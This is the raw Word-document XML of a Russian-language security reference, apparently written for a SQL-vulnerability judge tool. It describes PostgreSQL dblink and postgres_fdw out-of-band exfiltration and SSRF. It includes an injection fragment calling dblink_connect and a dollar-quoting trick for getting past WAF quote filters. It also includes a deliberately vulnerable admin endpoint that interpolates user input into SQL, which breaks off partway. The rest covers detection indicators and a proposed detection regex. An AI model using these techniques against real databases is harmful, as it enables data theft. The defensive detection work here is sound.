          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не указан (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode=prefer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — дефолт) и сервер-приёмник не отвечает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSLRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> положительно — startup-packet идёт plaintext.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UNION SELECT 1, dblink_connect(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> валиден потому, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_connect(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает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('OK'/ошибка), что совпадает с типом колонки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в исходном запросе.</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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14–17 (поведение не менялось с 9.x).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EXTENSION dblink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NOT trusted → ставится только superuser-ом). После установки USAGE на функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> по умолчанию выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-роль вызывает свободно без дополнительных GRANT.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 вызова:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PUBLIC после установки extension. Не требуется ни superuser, ни predefined-роль. Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2</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Egress:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для DNS-канала достаточно UDP/53 наружу из PG-хоста (стандартно открыт); для TCP-канала — outbound TCP на порт listener-а атакующего (5432 или любой другой).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SSL:</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sslmode=require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prefer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) startup-packet plaintext. Включение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sslmode=verify-full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для outbound dblink не закрывает DNS-канал.</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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-роли</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легитимный dblink почти всегда из DBA/ETL-роли под отдельным сервис-аккаунтом, не из роли web-приложения.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conninfo, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> собран конкатенацией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 подзапросом или вызовом системной функции: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 FROM pg_*)</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DNS-логах хоста БД: запросы к доменам с длинными hex-подобными labels (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[0-9a-f]{30,60}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) в позиции subdomain.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Короткоживущие TCP-коннекты с хоста БД на внешние адреса на нестандартные порты, инициатор PID = backend postgres (видно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tnp</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pg_stat_activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> по PID).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Резкий рост ошибок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">could not establish connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL log от backend-процессов в окне атаки.</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9.x – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> включительно; поведение dblink не изменено в 17. Расширение dblink не помечено как deprecated.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на AWS RDS dblink доступен (preinstalled в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но egress TCP/DNS ограничен security group; на Google Cloud SQL — не входит в whitelist extensions; на Supabase — отключён по умолчанию, включается owner-ом проекта. Детальный разбор по провайдерам — см.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как параллельный SSRF/OOB-канал с другой моделью привилегий (требует USAGE на FDW, дефолтно superuser-only).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3.6.3, 3.6.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — file-read через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как альтернативный OOB-вектор.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3.9.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — dollar-quoting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) для обхода фильтра одинарной кавычки в conninfo, когда WAF блокирует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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension scripts как ступень эскалации, если в кластере удаётся подменить определение dblink.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dblink_exec</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app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нет. Ближайший по структуре существующий класс — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TIME_BASED_BLIND_INJECTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (regex по конкретным опасным PG-функциям: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WAITFOR DELAY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BENCHMARK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Расширять его не следует — у OOB-эксфильтрации другая семантика и другой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">suggested_fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.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добавить новый enum-вариант </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB_EXFILTRATION</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VulnerabilityClass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app/schemas/sql.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и regex-ветку в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> по тому же шаблону, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TIME_BASED_BLIND_INJECTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — паттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b(dblink_connect|dblink_exec|dblink)\s*\(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> плюс создание </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnerabilityFinding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с базовым риском 9.</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dblink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dblink_connect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libpq Connection Functions — PQconnectdb / startup-packet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dblink/lo_import data exfiltration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R1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PDKT-Team CTF writeup: fbctf2019 hr-admin-module — dblink DNS exfil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R1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section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RFC 1035, §2.3.1: Preferred name syntax — label charset &amp; length limit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6.2 postgres_fdw — SSRF и DNS-эксфильтрация</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 обёртка-клиент PostgreSQL к внешним PostgreSQL-серверам поверх libpq. Через цепочку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SERVER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USER MAPPING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FOREIGN TABLE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упакованную в анонимный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-блок, атакующий получает SSRF на любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host:port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от имени процесса postgres и параллельный DNS-эксфильтрационный канал в одном векторе.</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app/api/v1/admin.py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pydantic import BaseModel</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app.core.logging import get_logger</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log = get_logger("app.admin")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class RegisterForeignSourceRequest(BaseModel):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name: str</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    host: str</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    port: int = 5432</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    dbname: str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@router.post("/admin/foreign-sources")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def register_foreign_source(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    req: RegisterForeignSourceRequest,</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dict:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = text(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"DO $$ BEGIN "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
